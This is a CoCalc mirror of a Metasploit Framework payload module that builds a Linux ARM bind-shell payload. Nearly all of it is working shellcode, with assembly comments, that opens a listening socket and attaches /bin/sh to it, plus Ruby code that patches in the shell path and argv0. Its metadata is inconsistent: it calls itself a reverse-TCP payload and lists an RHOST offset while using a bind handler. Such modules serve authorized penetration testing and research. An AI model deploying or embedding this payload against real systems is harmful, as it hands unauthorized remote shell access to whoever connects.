Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/linux/armle/shell_bind_tcp.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
module MetasploitModule
7
CachedSize = 208
8
9
include Msf::Payload::Single
10
include Msf::Payload::Linux::Armle::Prepends
11
include Msf::Sessions::CommandShellOptions
12
13
def initialize(info = {})
14
super(
15
merge_info(
16
info,
17
'Name' => 'Linux Command Shell, Reverse TCP Inline',
18
'Version' => '',
19
'Description' => 'Connect to target and spawn a command shell',
20
'Author' => ['civ', 'hal'],
21
'License' => MSF_LICENSE,
22
'Platform' => 'linux',
23
'Arch' => ARCH_ARMLE,
24
'Handler' => Msf::Handler::BindTcp,
25
'Session' => Msf::Sessions::CommandShellUnix,
26
'Payload' => {
27
'Offsets' =>
28
{
29
'RHOST' => [ 172, 'ADDR' ],
30
'LPORT' => [ 170, 'n' ]
31
},
32
'Payload' =>
33
[
34
# socket
35
0xe3a00002, # mov r0, #2
36
0xe3a01001, # mov r1, #1
37
0xe3a02006, # mov r2, #6
38
0xe3a07001, # mov r7, #1
39
0xe1a07407, # lsl r7, r7, #8
40
0xe2877019, # add r7, r7, #25
41
0xef000000, # svc 0x00000000
42
0xe1a06000, # mov r6, r0
43
44
# bind
45
0xe28f1080, # 1dr r1, pc, #128
46
0xe3a02010, # mov r2, #16
47
0xe3a07001, # mov r7, #1
48
0xe1a07407, # lsl r7, r7, #8
49
0xe287701a, # add r7, r7, #26
50
0xef000000, # svc 0x00000000
51
52
# listen
53
0xe1a00006, # mov r0, r6
54
0xe3a07001, # mov r7, #1
55
0xe1a07407, # lsl r7, r7, #8
56
0xe287701c, # add r7, r7, #28
57
0xef000000, # svc 0x00000000
58
59
# accept
60
0xe1a00006, # mov r0, r6
61
0xe0411001, # sub r1, r1, r1
62
0xe0422002, # sub r2, r2, r2
63
0xe3a07001, # mov r7, #1
64
0xe1a07407, # lsl r7, r7, #8
65
0xe287701d, # add r7, r7, #29
66
0xef000000, # svc 0x00000000
67
68
# dup
69
0xe1a06000, # mov r6, r0
70
0xe3a01002, # mov r1, #2
71
0xe1a00006, # mov r0, r6
72
0xe3a0703f, # mov r7, #63 ; 0x3f
73
0xef000000, # svc 0x00000000
74
0xe2511001, # subs r1, r1, #1
75
0x5afffffa, # bpl 8c <.text+0x8c>
76
77
# execve("/system/bin/sh", args, env)
78
0xe28f0024, # add r0, pc, #36 ; 0x24
79
0xe0244004, # eor r4, r4, r4
80
0xe92d0010, # push {r4}
81
0xe1a0200d, # mov r2, sp
82
0xe28f4024, # add r4, pc, #36 ; 0x10
83
0xe92d0010, # push {r4}
84
0xe1a0100d, # mov r1, sp
85
0xe3a0700b, # mov r7, #11 ; 0xb
86
0xef000000, # svc 0x00000000
87
88
# <af>:
89
0x04290002, # .word 0x5c110002 @ port: 4444 , sin_fam = 2
90
0x0101a8c0, # .word 0x0101a8c0 @ ip: 192.168.1.1
91
92
# <shell>:
93
0x00000000, # .word 0x00000000 ; the shell goes here!
94
0x00000000, # .word 0x00000000
95
0x00000000, # .word 0x00000000
96
0x00000000, # .word 0x00000000
97
98
# <arg>:
99
0x00000000, # .word 0x00000000 ; the args!
100
0x00000000, # .word 0x00000000
101
0x00000000, # .word 0x00000000
102
0x00000000, # .word 0x00000000
103
].pack('V*')
104
}
105
)
106
)
107
108
# Register command execution options
109
register_options(
110
[
111
OptString.new('SHELL', [ true, 'The shell to execute.', '/bin/sh' ]),
112
OptString.new('ARGV0', [ false, 'argv[0] to pass to execve', 'sh' ]) # mostly used for busybox
113
]
114
)
115
end
116
117
def generate(_opts = {})
118
p = super
119
120
sh = datastore['SHELL']
121
if sh.length >= 16
122
raise ArgumentError, 'The specified shell must be less than 16 bytes.'
123
end
124
125
p[176, sh.length] = sh
126
127
arg = datastore['ARGV0']
128
if arg
129
if arg.length >= 16
130
raise ArgumentError, 'The specified argv[0] must be less than 16 bytes.'
131
end
132
133
p[192, arg.length] = arg
134
end
135
136
p
137
end
138
end
139
140